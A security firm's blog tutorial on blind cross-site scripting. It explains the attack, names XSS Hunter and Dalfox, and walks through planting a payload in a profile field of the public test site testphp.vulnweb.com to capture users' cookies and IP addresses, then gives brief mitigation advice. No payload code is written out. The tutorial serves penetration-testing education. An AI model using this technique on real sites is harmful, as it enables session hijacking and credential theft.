Search

Find Your First Blind XSS!

Find Your First Blind XSS- Securium Solutions

Greeting Everyone! Hope everything Is going good, Today in this blog we will go through Blind XSS as our Previous blog we discussed what is XSS and how it  work in this blog we will Go through it cross site Scripting .

Table of Content

  • What is Blind XSS?
  • Impact Of Blind XSS?
  • Common tool ?
  • Example Walk through ?
  • How to Mitigate Against Blind XSS?
  • How to Mitigate Against Blind XSS?

Before we start If your not aware about what is blind XSS, Blind XSS (cross site scripting) is always work as Reflected or Stored XSS And As result We get Same But different is Blind XSS Work like stored XSS When attacker through javascript payload through input parameter which is execute by the server as result it reflected on developer application. An attacker try to execute payload through Comment box, Feedback form, Chat applications / forums etc. It Is harder to Detect compare with Stored or reflected XSS.

Impact of Blind XSS?

Impact are same  For Blind, reflected, stored xss .

  1. Hijacking User/ admin session
  2. Cause to account takeover
  3. Perform Phishing attack
  4. Stael user /admin cookie / credentials

Common tool for Blind XSS?

XSS hunter  https://xsshunter.com/

Dalfox  https://github.com/hahwul/dalfox

How to test for Blind XSS?

As We have Our targeted Website For Testing Purpose http://testphp.vulnweb.com/ As we Logged In An Now we are In User dashboard Section.

As Above picture We see Now we are In User profile dashboard Now there Is different Input Field Which Stored User data .

Now here We have Awesome tool xss hunter which easily help us to verify Against it. Now go to hunter https://xsshunter.com/ And create Your Account.

As above picture we see Interface for xss hunter Now do login and You will see dashboard which has already Generated different payload to help our testing phase and it create Server for all user Note: We can use Different payload by including Server address.

Now as above picture we see Interface with different payload .

Now Navigate to http://testphp.vulnweb.com/ As below picture  We see Name which in input field Now In name field Execute Our payload with help of XSS Hunter.

We Executed Our Payload And it got executed.

Now navigate to Your xsshunter panel And Go to XSS fires section To see Is our XSS worked or not, 

As above picture we see Our XSS payload Was Fired On Application Due To Improper validation of input And we are able to manipulate Users Session , IP Etc. 

We manipulate User IP Address, Cookies Which is user Password and User name . This is How Blind XSS Work Hope Now You Can easily Able to find it on your targeted website, If your Doing Penetration Testing or Bug Bounty Hunting Against Your targeted Website .

How To Mitigate Against Risk:

To mitigate We have to follow Some Steps:

  1. At the point where user input is inserted ,filter as strictly as possible based on what is expected or valid input .
  2. you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.

For More Visit References:

Conclusion: In today’s blog we discussed about How Blind XSS work? How To look for Blind XSS? As we discuss common Impact and mitigation against risk issue with suitable Example for exploitation .

Thanks For Reading……. See You In Another Blog!

Stick With Our Blog: Click Here 

Author

Pallab Jyoti Borah

VAPT Analyst

Table of Contents

Social Media
Facebook
Twitter
WhatsApp
LinkedIn